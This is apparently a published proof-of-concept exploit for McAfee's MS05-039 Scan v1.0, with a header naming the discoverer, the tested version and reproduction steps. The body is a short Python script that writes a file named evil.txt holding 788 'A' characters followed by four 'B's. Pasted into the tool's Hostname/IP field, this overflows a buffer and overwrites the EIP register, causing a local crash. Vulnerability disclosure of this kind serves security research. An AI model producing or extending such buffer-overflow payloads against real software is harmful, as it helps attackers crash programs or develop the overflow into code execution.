MS05-039 Scan version 1.0 Hostname / IP field local buffer overflow proof of concept exploit.
7ed261a9cd6c2588b6fbb6c0c4303ce017ca1d2d74f3e3e6fdfd7291d9fd4491
#!/usr/bin/python
# Exploit Title : MS05-039 Scan v1.0 Hostname/IP Field Local BoF PoC
# Discovery by : Anurag Srivastava
# Email : anurag.srivastava@pyramidcyber.com
# Discovery Date : 18/08/2017
# Software Link : https://www.mcafee.com/in/downloads/free-tools/ms05-039-scan.aspx
# Tested Version : 1.0
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 10 Home x64
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
buffer = "A"*788
eip = "B"*4
f = open("evil.txt", "wb")
f.write(buffer+eip)
f.close()